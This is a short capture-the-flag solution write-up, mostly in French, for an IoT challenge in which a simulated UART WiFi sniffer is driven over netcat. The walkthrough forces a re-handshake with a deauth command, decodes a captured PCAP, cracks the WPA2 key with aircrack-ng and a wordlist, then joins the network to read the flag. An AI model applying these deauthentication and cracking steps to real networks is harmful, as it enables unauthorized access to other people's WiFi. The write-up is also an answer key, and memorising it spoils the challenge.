1.1 KiB
1.1 KiB
Cr4ck_W1F1 — Solution
Difficulty: Medium | Category: IoT | Flag: CTF{CR4CK_W1F1_EXAMPLE}
Note: Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement.
Overview
UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis connecte au réseau pour lire le flag.
- TX (port 1111): Read only
- RX (port 2222): Write only
Steps
- Ouvrir deux terminaux :
nc <host> 1111 # TX — lecture
nc <host> 2222 # RX — écriture
- Dans RX, démarrer le sniffer et forcer un re-handshake :
sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop
- Sur TX, récupérer le bloc PCAP base64 entre les marqueurs :
PCAP_BASE64_BEGIN
...
PCAP_BASE64_END
Sauvegarder et décoder :
base64 -d handshake.b64 > handshake.pcap
- Cracker la capture :
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
# → KEY FOUND! [ sunshine ]
- Se connecter au réseau et lire le flag :
connect TestNet sunshine
cat /flag.txt
Flag
CTF{CR4CK_W1F1_EXAMPLE}
Author
Eun0us